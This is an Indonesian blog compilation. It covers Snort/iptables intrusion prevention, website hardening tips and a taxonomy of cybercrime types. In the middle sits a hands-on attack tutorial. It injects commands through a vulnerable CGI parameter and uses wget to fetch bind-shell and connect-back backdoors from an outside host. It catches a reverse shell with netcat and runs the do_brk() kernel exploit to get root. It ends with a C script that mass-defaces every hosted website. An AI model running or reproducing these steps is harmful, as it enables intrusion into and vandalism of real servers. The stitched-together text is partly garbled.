Sistem Pencegahan Penyusupan (Intrusion Preventing System atau IPS) adalah suatu tools yang digunakan untuk mencegah adanya penyusupan. Ada 2 fungsi dalam IPS yakni kemampuan mendeteksi penyusupan dan kemampuan untuk mencegah akses penyusupan.Kemampuan mendeteksi penyusupan secara umum disebut IDS (Instrusion Detection System) dan kemampuan untuk mencegah akses dikenal dengan Firewall. Komponen Sistem Pencegahan PenyusupanSistem pencegahan penyusupan harus dapat mendeteksi dan merespon terhadap penyusupan yakni dengan mengkonfigurasi ulang rule firewall yang ada. Untuk itu komponen-komponen yang harus ada pada sistem pencegahan penyusupan meliputi:
• IDS (Intrusion Detection System).
Dilihat dari cara kerja dalam menganalisa apakah paket data dianggap sebagai penyusupan atau bukan, IDS dibagi menjadi 2:knowledge based atau misuse detection dan behavior based atau anomaly based. Knowledge-based IDS dapat mengenali adanya penyusupan dengan cara menyadap paket data kemudian membandingkannya dengan database rule IDS (berisi catatan paket serangan). Jika paket data mempunyai pola yang sama dengan salah satu atau lebih pola di database rule IDS, maka paket tersebut dianggap sebagai serangan, dan demikian juga sebaliknya, jika paket data tersebut sama sekali tidak mempunyai pola yang sama dengan pola di database rule IDS, maka paket data tersebut dianggap bukan serangan.
Sedangkan behavior based (anomaly) dapat mendeteksi adanya penyusupan dengan mengamati adanya kejanggalan-kejanggalan pada sistem, atau adanya penyimpangan-penyimpangan dari kondisi
normal, sebagai contoh ada penggunaan memori yang melonjak secara terus menerus atau ada koneksi parallel dari 1 buah IP dalam jumlah banyak dan dalam waktu yang bersamaan. Kondisi-kondisi diatas
dianggap kejanggalan yang kemudian oleh IDS jenis anomaly based dianggap sebagai serangan.
Sedangkan dilihat dari kemampuan mendeteksi penyusupan pada jaringan, IDS dibagi menjadi 2 yakni: host based dan network based.
Host based mampu mendeteksi hanya pada host tempat implementasi IDS, sedangkan network based IDS mampu mendeteksi seluruh host yang berada satu jaringan dengan host implementasi IDS tersebut. Tulisan ini secara khusus menggunakan IDS jenis knowledge based dan network based.
• Packet Filtering Firewall.
Packet Filtering Firewall dapat membatasi akses koneksi berdasarkan parameter-parameter: protokol, IP asal, IP tujuan, port asal, port tu-juan, chain (aliran data) dan code bit sehingga dapat diatur hanya akses yang sesuai dengan policy saja yang dapat mengakses sistem. Packet filtering firewall ini bersifat statik sehingga fungsi untuk membatasi aksespun statik, misalnya akses ke web server (port 80) di-ijinkan oleh policy, maka dari manapun dan apapun aktifitas terhadap webserver diijinkan walaupun merupakan usaha penetrasi oleh craker. Untuk itulah packet filtering firewall tidak dapat mengatasi gangguan yang bersifat dinamik sehingga harus dikombinasikan dengan IDS untuk membentuk sistem hardening yang maksimal.
• Engine Sistem Pencegahan Penyusupan (IDS-Firewall).
Engine ini bertugas untuk membaca alert dari IDS (antara lain berupa jenis serangan dan IP Address penyusup) untuk kemudian memerintahkan firewall untuk memblok akses koneksi ke sistem dari penyusup tersebut.
Dimana diletakkan Sistem Pencegahan Penyusupan?
Sistem pencegahan penyusupan akan maksimal jika diletakkan di router sehingga daerah kerja sistem ini dapat mencakup semua host yang berada dalam 1 jaringan dengan router tempat mengimplementasikan Sistem Pencegahan Penyusupan. Masalah timbul ketika konsentrator menggunakan switch dimana proses penyadapan yang harus dilakukan dalam proses deteksi penyusupan menjadi tidak berfungsi, salah satu cara yang mudah untuk mengatasi masalah ini adalah dengan melakukan spoofing MAC address terhadap host-host yang akan diamati. Posisi sistem pencegahan penyusupan untuk menghasilkan hasil yang maksimal.
Sistem Pencegahan Penyusupan berupa IDS dan Firewall yang diimplementasikan di router/gateway antara internet-DMZ digunakan untuk melindungi server-server yang berada di wilayah DMZ dari kemungkinan serangan dari internet, sedangkan yang diimplentasikan antara jaringan DMZ-intranet digunakan untuk melindungi kemungkinan serangan dari intranet ke wilayah DMZ maupun internet.Snort IDS dan IPTables Firewall
Seperti dijelaskan sebelumnya, sistem pencegahan penyusupan dibangun dari 2 komponen utama yakni IDS dan Firewall. Dalam pembahasan ini, IDS yang digunakan adalah Snort (www.snort.org) sedangkan firewall yang digunakan adalah Iptables yang merupakan firewall bawaan Linux.
Snort IDS
Snort IDS merupakan IDS open source yang secara defacto menjadi standar IDS di industri. Snort dapat didownload di situs www.snort.org. Snort dapat diimplementasikan dalam jaringan yang multiplatform, salah satu kelebi-hannya adalah mampu mengirimkan alert dari mesin Unix atupun Linux ke platform Microsoft Windows dengan melalui SMB. Snort dapat berkerja dalam 3 mode: sniffer
mode (penyadap), packet logger dan network intrusion detection mode. Tentunya mode kerja yang akan digunakan dalam membangun sistem pencegahan penyusupan dalam mode kerja network intrusion
dection. Penyusupan (intrusion) didefinisikan sebagai kegiatan yang bersifat anomaly, incorrect atau inappropriate yang terjadi di jaringan atau di host.
Komponen-komponen Snort IDS meliputi:
• Rule Snort
Rule Snort merupakan database yang berisi pola-pola serangan berupa signature jenis-jenis serangan. Rule Snort IDS ini, harus diupdate secara rutin agar ketika ada suatu teknik serangan yang baru, serangan tersebut dapat terdeteksi. Rule Snort dapat didownload di www.snort.org.
Dari rule-rule seperti di ataslah IDS Snort menentukan apakah sebuah paket data dianggap sebagai penyusupan/serangan atau bukan, paket data dibandingkan dengan rule IDS, jika terdapat dalam rule, maka paket data tersebut dianggap sebagai penyusupan/serangan dan demikian juga sebaliknya jika tidak ada dalam rule maka dianggap bukan penyusupan/serangan.
• Snort Engine
Snort Engine merupakan program yang berjalan sebagai daemon proses yang selalu bekerja untuk membaca paket data dan kemudian mem-bandingkannya dengan rule Snort. Dalam sistem Linux, untuk
mende-teksi apakah snort engine dalam keadaan aktif atau tidak dengan melihat prosesnya seperti contoh di bawah ini:
[root@localhost rules] # ps aux | grep snort
root 3060 0.0 1.3 9188 820 ? S Jun03 0:04 [snort]
Contoh diatas menunjukkan bahwa snort engine dalam keadaan aktif dengan proses ID 3060 dan dijalankan oleh user "root"
• Alert
Alert merupakan catatan serangan pada deteksi penyusupan. Jika snort engine menghukumi paket data yang lewat sebagai serangan, maka snort engine akan mengirimkan alert berupa log file. Untuk kebutuhan analisa, alert dapat disimpan di dalam database, sebagai contoh ACID (Analysis Console for Intrusion Databases) sebagai modul tambahan pada Snort.
Contoh alert sebagai berikut:
[**] [1:499:3] ICMP Large ICMP Packet [**] [Classification:
Potentially Bad Traffic] [Priority: 2] 05/09-20:15:14. 895348
10.1.4.113 -> 10.1.3.126 ICMP TTL:128 TOS:0x0 ID:6316
IpLen:20 DgmLen:65528 Type:8 Code:0 ID:512 Seq:3072 ECHO
[Xref => http://www.whitehats.com/info/IDS246]
Contoh alert di atas merupakan alert ketika terdapat paket data dalam ukuran besar dari IP Address 10.1.4.113 ke 10.1.3.126 yang dianggap sebagai serangan oleh Snort karena pola paket data tersebut terdapat dalam rule Snort.
Hubungan ketiga komponen IDS dijelaskan dalam gambar berikut:
IPTables Firewall
IPTables merupakan firewall bawaan Linux. Iptables mampu melakukan filtering dari layer transport sampai layer fisik. Sebagai contoh rule dalam sebuah firewall akan menutup semua koneksi kecuali ke port 80 protokol TCP, atau sebuah rule firewall mendefiniskan bahwa yang dapat melakukan koneksi hanya paket data yang berasal dari MAC address 00-80-48-24-3b-e5. Variabel-variabel dalam Iptables Firewall meliputi:
• Protokol, contoh: tcp, udp, icmp
• Port asal, contoh: port yang lebih besar dari 1023
• Port tujuan, contoh: port 21, 22, 80
• IP asal/Jaringan asal: contoh 202.91.8.112, 202.62.9.216/28
• IP tujuan/Jaringan tujuan: contoh 202.91.8.112,202.62.9.216/28
• Chain (aliran), contoh: INPUT, OUTPUT, FORWARD (khusus router)
• Code bit (flag), contoh: SYN, ACK.
Contoh rule firewall pada Iptables sebagai berikut:
iptables -A FORWARD -p tcp -d 202.91.8.112 —dport 80 –j ACCEPT
iptables -A FORWARD -p tcp -d 202.91.8.112 -j DROP
Rule di atas mendefinisikan bahwa semua paket data dengan protocol tcp dari manapun yang menuju 202.91.8.112 ditolak semua kecuali yang menuju ke port 80.
Written by islamarket.net
Sunday, 10 May 2009 17:27 –
Berikut ini adalah beberapa tips dalam Membangun Websites yang tidak mudah di jebol Hacker. Tips ini dibuat oleh moderator komunitas white hacker Yogyafree, Nathan Gusti Ryan.Sehubungan dengan maraknya deface atau hacking isi websites pemerintah maupun organisasi besar maka berikut ini berbagai tips yang dapat dilakukan oleh web administrator untuk membangun Webserver yang tangguh dan tidak mudah dibobol oleh Hacker.
Tips Pertama
Pada umumnya, hosting websites dilakukan pada ISP (Internet Service Provider) dengan space tertentu, lalu kita melakukan upload website via FTP atau via CPANEL (Control Panel).Webhosting inilah yang rawan dan mudah sekali dibobol oleh Hacker di antaranya mengunakan teknik SQL Injection. Maka disarankan agar mengunakan Server sendiri dan mengunakan VPS (Virtual Private Server). Dengan Server sendiri atau Virtual Private Server bisa mengunakan berbagai proteksi terhadap kita secara Customized. Beda dengan Web Hosting, proteksi security dilakukan terserah apa kata ISP. Kelemahan proteksi inilah yang dimanfaatkan oleh Hacker dengan melakukan Port Scanning untuk menemukan celah security yang bisa ditembus untuk bisa masuk dan mengambil alih websites tersebut.
Tips Kedua
Mengunakan Hardware Security yang powerfull diantaranya yang memiliki fitur Firewall, IDS (Intrusion Detection System) dan IPS (Intrusion Prevention System). Contohnya mengunakan Fortigate, Cisco Series Security, 3Com Tipping Point, dan lainnya. Dapat juga mengunakan software IDS seperti Black ICE Countermeasures ataupun Distro Linux untuk security system seperti Smootwall, Monowall, Customized Distro Linux, dan lainnya. Umumnya, baik software maupun hardware security ini bisa secara otomatis mengirimkan email alert bahkan bisa mengirimkan alert via SMS jika system mendeteksi adanya serangan dari hacker.
Tips Ketiga
Mengunakan system yang Stable yang sudah perfect systemnya, sehingga kemungkinan adanya celah keamanan juga dapat diminimalkan. Banyaknya software atau tool web builder dengan berbagai versi terutama versi gratis/ free License/ Freeware, sebaiknya para pemakai memilih versi yang sudah dinyatakan Stable. Seperti adanya BUG pada software Joomla versi 1.5.0 - 1.5.5.
Tips Keempat
Web Administrator/ System Administrator harus melakukan Review, Testing, Simulasi secara berkala terhadap keamanan pada Server yang dikelolanya. Bahkan bisa bekerja sama dengan Hacker (White Hacker yang dapat dipercaya reputasinya) untuk melakukan Audit terhadap implementasi Security webservernya.
Banyak sekali tujuan sebuah proses hacking terhadap server, ada sebagian orang
melakukan hacking hanya sebatas deface, untuk tujuan carding, untuk mendapat full
akses (root priviledges) server, ada juga yang bertujuan untuk mematikan servis sistem dan network (Denial of Services). Proses hacking dapat dilakukan secara acak ataupun tertarget, acak dalam artian attacker melakukan proses hacking secara masal misal dengan bantuan search engine google, sedangkan tertarget maksudnya attacker
melakukan hacking terhadap sebuah sistem atau server tertentu. Pada kesempatan kali ini penulis mo sharing ma temen-temen bagaimana root priviledge server sebuah hosting bisa di peroleh attacker dengan bantuan search engine (proses hacking acak).
Banyak sekali orang beranggapan bahwa tanggung jawab sekuritas sistem dalam sebuah server anggaplah server hosting adalah tanggun jawab dari sysadmin sedangkan para webmaster site hanya berpikir agar sitenya dikunjungi dan banyak sekali para webmaster (walaupun gak semua) yang mengacuhkan sekuritas. Upzz, inilah jalan masuk terbaik bagi attacker untuk masuk ke sistem, why..?? Tentu saja karena port 80 yang harus selalu terbuka. Lalu bagaimana root priviledge sebuah server diperoleh..?? Berikut ini detail teknik yang sering dipakai oleh para attacker untuk memperoleh tujuan full akses.Hole via URL yang biasa dipakai untuk memperoleh full akses terhadap sistem adalah hole remote ekskusi seperti PHP injection dan CGI remote execution. Sebuah assumsi bahwa dalam sebuah hosting ada salah satu webmaster yang menggunakan software vulnerable yang belum terpatch misalnya w_s3adix.cgi yang di produksi oleh Y.SAK. Berikut hole dari w_s3adix.cgi yang ditemukan oleh blahpok a.k.a choi GSO community w_s3adix.cgi?st=parameter&re=parameter& o=file.txt|command|.
Tahap pertama yang dilakukan oleh para attacker adalah menggunakan search engine google untuk mencari website yang menginstall software w_3sadix.cgi vulnerable missal dalam box keyword di isi dengan allinurl : w_3sadix.cgi? no= . Setelah attacker mendapatkan sasarannya inilah saat attacker mencoba-coba bagaimana dia memperoleh full akses terhadap sistem. Untuk memperoleh root priviledges dari hole via URL seorang attacker harus bisa memperoleh lokal shell sistem, ada dua cara yang biasa dipakai para attacker untuk memperoleh lokal shell yaitu menggunakan bindty dan teknik connectback.
Perlu digaris bawahi bahwa hole yang digunakan untuk memperoleh shell adalah
hole remote ekskusi yang memungkinkan bagi attacker untuk mengakses command
sistem (console) via browser. Sehingga dari browser attacker bisa mendownload file ke sistem target, mengkompile dan mengekskusinya. Download script bindty ke sistem
target, kompile dan ekskusi.http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c => Code bindty shell by sd then modified by KillFinger then Modified again by Ph03n1X.
Misal anda menggunakan website http://webmu.com/bind.c untuk menghosting script bindty maka download script bindty itu ke server sistem target untuk memperoleh shell lokal target. Tentunya anda harus mendownload script tadi ke directory yang bisa anda tulisi misalnya /tmp tau /var/tmp. Kemudian kompile dan eksekusi http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|wget
http://webmu.com/bind.c -O /var/tmp/bind.c| http://www.target.com w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000|
Lihat diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port 4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
passwd changeme
changeme
=- WELCOME TO THE SERVER -=
sh-2.05b$
Cara kedua untuk menaklukan lokal shell target adalah dengan metode connect-back menggunakan scipt buatan AresU dari 1stlink.
http://student.te.ugm.ac.id/~phoenix03/audit/backup.pl => Coded By AresU
Seperti halnya menggunakan bindty, download script connect-back ke server target ke
directory yang bisa ditulisi misalnya /tmp atau /var/tmp.
http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|wget
http://webmu.com/back.pl -O /var/tmp/back.pl|
Kemudian jalankan netcat di box anda dengan option port listen -l, box anda harus
mempunyai IP publik sehingga bisa di akses cross internet (misal 212.123.24.190).
Ekskusi script connect-back yang sudah di download di server target melalui browser.
myshell~> nc -l 21
www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|perl
/var/tmp/back.pl 212.123.24.190 21|
Kemudian lihat box anda.....
myshell~>nc -l 21
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux xxxxxxxxxxx 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux
uid=502(apache) gid=502(apache) groups=502(apache)
cat /etc/issue
Red Hat Linux release 9 (Shrike)
Kernel \r on an \m
Weksss, di sini penulis memperoleh target server Red Hat 9 (Shrike) yang versi kernelnya
2.4.20-8, kernel ini secara default memiliki hole lokal do_brk() yang kalo gak di patch
maka privledge root bisa diperoleh. Sebuah eksploits yang biasa digunakan untuk
mengekploitasi bug ini adalah hatorihanzo.c yang bisa anda download di link berikut
http://student.te.ugm.ac.id/~phoenix03/audit/hatorihanzo.c .
Kemudian ikuti step step berikut :
wget http://student.te.ugm.ac.id/~phoenix03/audit/hatorihanzo.c
--04:00:20-- http://student.te.ugm.ac.id/%7Ephoenix03/audit/hatorihanzo.c
=> `hatorihanzo.c'
Resolving student.te.ugm.ac.id... done.
Connecting to student.te.ugm.ac.id[222.124.24.19]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,510 [text/plain]
0K ...... 100% 9.35 KB/s
04:00:24 (9.35 KB/s) - `hatorihanzo.c' saved [6510/6510]
gcc -static -o hatori hatorihanzo.c
ls -al
total 440
drwxrwxrwt 2 root root 4096 Sep 3 04:00 .
drwxr-xr-x 18 root root 4096 Sep 9 2004 ..
-rwxr-xr-x 1 root root 428460 Sep 3 04:00 hatori
-rw-r--r-- 1 root root 6510 Dec 16 2003 hatorihanzo.c
./hatori (wait a moment)
id
uid=0(root) gid=0(root)
Binggo, Sekarang anda memperoleh shell root target, yah sekarang anda adalah
mahadewa di sistem itu :P~. Lalu bagaimana masalah backdooring hmm, cari referensinya di google, gunakan keyword sshdoor, shv dan lainnya. Sekarang penulis
hanya hendak berbagi pengalaman tentang mass defacing server target (Assumsi penulis bahwa server yang ditaklukan adalah server hosting). Untuk mengetahui di folder mana website-website di server itu disimpan, cari file konfigurasi apache httpd.conf, baca dan perhatikan baik-baik dimana DocumentRoot dari website yang ada.
find / -name httpd.conf |
/usr/local/apache2/conf/httpd.conf
cat /usr/local/apache2/conf/httpd.conf
Berikut ini konfigurasi virtual domain yang didapat :
ServerName xxxxxxxx.jp
ServerAdmin webmaster@xxxxxxx.jp
ServerAlias xxxxxxx.jp
ScriptAlias /cgi-bin/ /home/beso-kbkb/public_html/cgi-bin/
DocumentRoot /home/beso-kbkb/public_html
user xxxxxxxx
group xxxxxxxx
CustomLog logs/210.189.77.28:80-www.xxxxxxx.jp-access.log combined
ErrorLog logs/210.189.77.28:80-www.xxxxxxxx.jp-error.log
CustomLog /home/members/public_html/logs/ xxxxxxxx /access_log combined
#LCControlDomain kbkb.beso.jp
AliasMatch ^/~([^/]+)/(.*) /home/lcvirtualdomain/ xxxxxxxx.jp/users/$1/public_html/$2
ServerName xxxxxxxx.ne.jp
ServerAdmin webmaster@ xxxxxxxx.ne.jp
ServerAlias xxxxxxxx.ne.jp
ScriptAlias /cgi-bin/ /home/ xxxxxxxx /public_html/cgi-bin/
DocumentRoot /home/ xxxxxxxx /public_html
user xxxxxxxx
group xxxxxxxx
CustomLog logs/210.189.77.28:80-www. xxxxxxxx.ne.jp-access.log combined
ErrorLog logs/210.189.77.28:80-www. xxxxxxxx.ne.jp-error.log
CustomLog /home/members/public_html/logs/ xxxxxxxx/access_log combined
#LCControlDomain xxxxxxxx.ne.jp
AliasMatch ^/~([^/]+)/(.*) /home/lcvirtualdomain/
xxxxxxxx.ne.jp/users/$1/public_html/$2
Sekarang bisa anda lihat bahwa DocumentRoot dari masing-masing website adalah
/home/nama-website/public_html/ dan semua website terletak di subdirectory /home.
Untuk melakukan deface masal lakukan langkah-langkah berikut :
cd /home
ls > host.txt
Kemudian buat script berikut, terserah bagaimana cara anda yang jelas script ini beserta hasil ekskusinya harus di simpan di directory /home.
#include "stdio.h"
/* Coded By Ph03n1X
king_purba@yahoo.co.uk
student.te.ugm.ac.id/~phoenix03
*/
main()
{
FILE *ax;
char aa[1000],bb[1000];
if((ax=fopen("host.txt","r"))==NULL)
{
printf("Gagal\n");
exit(0);
}
while(fgets(aa,sizeof(aa),ax))
{
aa[strlen(aa)-1]='\0';
snprintf(bb,sizeof(bb),"echo hack by Ph03n1X > %s/public_html/deface.txt",aa);
system(bb);
}s
ystem("find /home -name deface.txt > result.txt");
}
Simpan script diatas sebagai file berekstensi .c misal deface.c, kompile dan ekskusi di
folder /home.
gcc -o deface deface.c
./deface
Sekarang lihat hasil deface masal anda di file result.txt yang dihasilkan dari ekskusi script diatas.Setelah bisa menjebol sistem, tentu tidaklah lengkap kalo tidak bisa menambalnya. Lalu bagaimanakah seorang sysadmin seharusnya untuk meminimalkan kejadian seperti ini.
lihatlah bahwa hole awal sistem adalah hole user dalam hal ini webmaster salah satu
website yang di hosting di server, maka tidaklah mungkin untuk bisa memantau semua
user apalagi kalo jumlahnya cukup banyak. Berikut beberapa tips untuk meminimalkan
kejadian seperti ini.
1. Sering-seringlah check directory /tmp dan /var/tmp karena ini adalah directory
favorit para intruder.
2. Sering-seringlah melakukan checking terhadap logs sistem seperti access_logs
apache, /var/log/authlog, /var/logs/adduser dan lain-lainnya
3. Buatlah directory /tmp dalam partisi hardisk terpisah, kemudian hapus directory
/var/tmp default dan ganti dengan ln -s /tmp /var/tmp
Berikan option noexec dan nosuid di partis /tmp melalui /etc/fstab misalnya :
/dev/wd0h /tmp ffs rw,noexec,noatime,nodev,nosuid 1 2
4. Kemudian jika anda menggunakan script server side, disable semua fungsi yang
digunakan untuk mengakses command system. Misalnya untuk PHP disable
fungsi-fungsi berikut dari php.ini disable_functions = escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_get_status, proc_nice, proc_open,proc_terminate, shell_exec, system
5. Gunakan firewall dengan default deny terutama untuk semua koneksi masuk dan
forward.
6. Selalu melakukan patching jika hole baru ditemukan, untuk ini dituntut kerja
keras admin dalam mencari informasi.
Mudah-mudahan tulisan ini bermanfaat walaupun singkat :P~
REFERENSI :
http://google.co.id
http://bosen.net
http://jasakom.com
http://echo.or.id
Cybercrime adalah tidak criminal yang dilakkukan dengan menggunakan teknologi computer sebagai alat kejahatan utama. Cybercrime merupakan kejahatan yang memanfaatkan perkembangan teknologi computer khusunya internet. Cybercrime didefinisikan sebagai perbuatan melanggar hukum yang memanfaatkan teknologi computer yang berbasasis pada kecanggihan perkembangan teknologi internet.
Karakteristik Cybercrime
Dalam perkembangannya kejahatan konvensional cybercrime dikenal dengan :
1. Kejahatan kerah biru
2. Kejahatan kerah putih
Cybercrime memiliki karakteristik unik yaitu :
1. Ruang lingkup kejahatan
2. Sifat kejahatan
3. Pelaku kejahatan
4. Modus kejahatan
5. Jenis kerugian yang ditimbulkan
Dari beberapa karakteristik diatas, untuk mempermudah penanganannya maka cybercrime diklasifikasikan :
1. Cyberpiracy : Penggunaan teknologi computer untuk mencetak ulang software atau informasi, lalu mendistribusikan informasi atau software tersebut lewat teknologi komputer.
2. Cybertrespass : Penggunaan teknologi computer untuk meningkatkan akses pada system computer suatu organisasi atau indifidu.
3. Cybervandalism : Penggunaan teknologi computer untuk membuat program yang menganggu proses transmisi elektronik, dan menghancurkan data dikomputer.
c. Perkiraan perkembangan cyber crime di masa depan
dapat diperkirakan perkembangan kejahatan cyber kedepan akan semakin meningkat seiring dengan perkembangan teknologi atau globalisasi dibidang teknologi informasi dan komunikasi, sebagai berikut :
Denial of Service Attack. Serangan tujuan ini adalah untuk memacetkan sistem dengan mengganggu akses dari pengguna jasa internet yang sah. Taktik yang digunakan adalah dengan mengirim atau membanjiri situs web dengan data sampah yang tidak perlu bagi orang yang dituju. Pemilik situs web menderita kerugian, karena untuk mengendalikan atau mengontrol kembali situs web tersebut dapat memakan waktu tidak sedikit yang menguras tenaga dan energi.
Hate sites. Situs ini sering digunakan oleh hackers untuk saling menyerang dan melontarkan komentar-komentar yang tidak sopan dan vulgar yang dikelola oleh para “ekstrimis” untuk menyerang pihak-pihak yang tidak disenanginya. Penyerangan terhadap lawan atau opponent ini sering mengangkat pada isu-isu rasial, perang program dan promosi kebijakan ataupun suatu pandangan (isme) yang dianut oleh seseorang / kelompok, bangsa dan negara untuk bisa dibaca serta dipahami orang atau pihak lain sebagai “pesan” yang disampaikan.
Cyber Stalking adalah segala bentuk kiriman e-mail yang tidak dikehendaki oleh user atau junk e-mail yang sering memakai folder serta tidak jarang dengan pemaksaan. Walaupun e-mail “sampah” ini tidak dikehendaki oleh para user.
3. Jenis-jenis Cybercrime
a. Jenis-jenis cybercrime berdasarkan jenis aktivitasnya
1. Unauthorized Access to Computer System and Service
Kejahatan yang dilakukan dengan memasuki/menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Biasanya pelaku kejahatan (hacker) melakukannya dengan maksud sabotase ataupun pencurian informasi penting dan rahasia. Namun begitu, ada juga yang melakukan hanya karena merasa tertantang untuk mencoba keahliannya menembus suatu sistem yang memiliki tingkat proteksi tinggi. Kejahatan ini semakin marak dengan berkembangnya teknologi internet/intranet.
Kita tentu tidak lupa ketika masalah Timor Timur sedang hangat-hangatnya dibicarakan di tingkat internasional, beberapa website milik pemerintah RI dirusak oleh hacker (Kompas, 11/08/1999). Beberapa waktu lalu, hacker juga telah berhasil menembus masuk ke dalam database berisi data para pengguna jasa America Online (AOL), sebuah perusahaan Amerika Serikat yang bergerak dibidang e-commerce, yang memiliki tingkat kerahasiaan tinggi (Indonesian Observer, 26/06/2000). Situs Federal Bureau of Investigation (FBI) juga tidak luput dari serangan para hacker, yang mengakibatkan tidak berfungsinya situs ini dalam beberapa waktu lamanya.
2. Illegal Contents
Merupakan kejahatan dengan memasukkan data atau informasi ke internet tentang sesuatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau mengganggu ketertiban umum. Sebagai contohnya adalah pemuatan suatu berita bohong atau fitnah yang akan menghancurkan martabat atau harga diri pihak lain, hal-hal yang berhubungan dengan pornografi atau pemuatan suatu informasi yang merupakan rahasia negara, agitasi dan propaganda untuk melawan pemerintahan yang sah, dan sebagainya.
3. Data Forgery
Merupakan kejahatan dengan memalsukan data pada dokumen-dokumen penting yang tersimpan sebagai scriptless document melalui internet. Kejahatan ini biasanya ditujukan pada dokumen-dokumen e-commerce dengan membuat seolah-olah terjadi “salah ketik” yang pada akhirnya akan menguntungkan pelaku.
4. Cyber Espionage
Merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer (computer network system) pihak sasaran. Kejahatan ini biasanya ditujukan terhadap saingan bisnis yang dokumen ataupun data-data pentingnya tersimpan dalam suatu sistem yang computerized.
5. Cyber Sabotage and Extortion
Kejahatan ini dilakukan dengan membuat gangguan, perusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan internet. Biasanya kejahatan ini dilakukan dengan menyusupkan suatu logic bomb, virus komputer ataupun suatu program tertentu, sehingga data, program komputer atau sistem jaringan komputer tidak dapat digunakan, tidak berjalan sebagaimana mestinya, atau berjalan sebagaimana yang dikehendaki oleh pelaku. Dalam beberapa kasus setelah hal tersebut terjadi, maka pelaku kejahatan tersebut menawarkan diri kepada korban untuk memperbaiki data, program komputer atau sistem jaringan komputer yang telah disabotase tersebut, tentunya dengan bayaran tertentu. Kejahatan ini sering disebut sebagai cyber-terrorism.
6. Offense against Intellectual Property
Kejahatan ini ditujukan terhadap Hak atas Kekayaan Intelektual yang dimiliki pihak lain di internet. Sebagai contoh adalah peniruan tampilan pada web page suatu situs milik orang lain secara ilegal, penyiaran suatu informasi di internet yang ternyata merupakan rahasia dagang orang lain, dan sebagainya.
7. Infringements of Privacy
Kejahatan ini ditujukan terhadap informasi seseorang yang merupakan hal yang sangat pribadi dan rahasia. Kejahatan ini biasanya ditujukan terhadap keterangan pribadi seseorang yang tersimpan pada formulir data pribadi yang tersimpan secara computerized, yang apabila diketahui oleh orang lain maka dapat merugikan korban secara materil maupun immateril, seperti nomor kartu kredit, nomor PIN ATM, cacat atau penyakit tersembunyi dan sebagainya.
8. Cracking
Kejahatan dengan menggunakan teknologi computer yang dilakukan untuk merusak system keamaanan suatu system computer dan biasanya melakukan pencurian, tindakan anarkis begitu merekan mendapatkan akses. Biasanya kita sering salah menafsirkan antara seorang hacker dan cracker dimana hacker sendiri identetik dengan perbuatan negative, padahal hacker adalah orang yang senang memprogram dan percaya bahwa informasi adalah sesuatu hal yang sangat berharga dan ada yang bersifat dapat dipublikasikan dan rahasia.
9. Carding
Adalah kejahatan dengan menggunakan teknologi computer untuk melakukan transaksi dengan menggunakan card credit orang lain sehingga dapat merugikan orang tersebut baik materil maupun non materil.
b. Jenis-jenis cybercrime berdasarkan motif
Berdasarkan motif cybercrime terbergi menjadi 2 yaitu :
Cybercrime sebagai tindak kejahatan murni : dimana orang yang melakukan kejahatan yang dilakukan secara di sengaja, dimana orang tersebut secara sengaja dan terencana untuk melakukan pengrusakkan, pencurian, tindakan anarkis, terhadap suatu system informasi atau system computer.
Cybercrime sebagai tindakan kejahatan abu-abu : dimana kejahatan ini tidak jelas antara kejahatan criminal atau bukan karena dia melakukan pembobolan tetapi tidak merusak, mencuri atau melakukan perbuatan anarkis terhadap system informasi atau system computer tersebut.
Selain dua jenis diatas cybercrime berdasarkan motif terbagi menjadi
Cybercrime yang menyerang individu : kejahatan yang dilakukan terhadap orang lain dengan motif dendam atau iseng yang bertujuan untuk merusak nama baik, mencoba ataupun mempermaikan seseorang untuk mendapatkan kepuasan pribadi. Contoh : Pornografi, cyberstalking, dll
Cybercrime yang menyerang hak cipta (Hak milik) : kejahatan yang dilakukan terhadap hasil karya seseorang dengan motif menggandakan, memasarkan, mengubah yang bertujuan untuk kepentingan pribadi/umum ataupun demi materi/nonmateri.
Cybercrime yang menyerang pemerintah : kejahatan yang dilakukan dengan pemerintah sebagai objek dengan motif melakukan terror, membajak ataupun merusak keamanan suatu pemerintahan yang bertujuan untuk mengacaukan system pemerintahan, atau menghancurkan suatu Negara
Diposkan oleh Kimleo | Permalink |
Label: CyberCrime
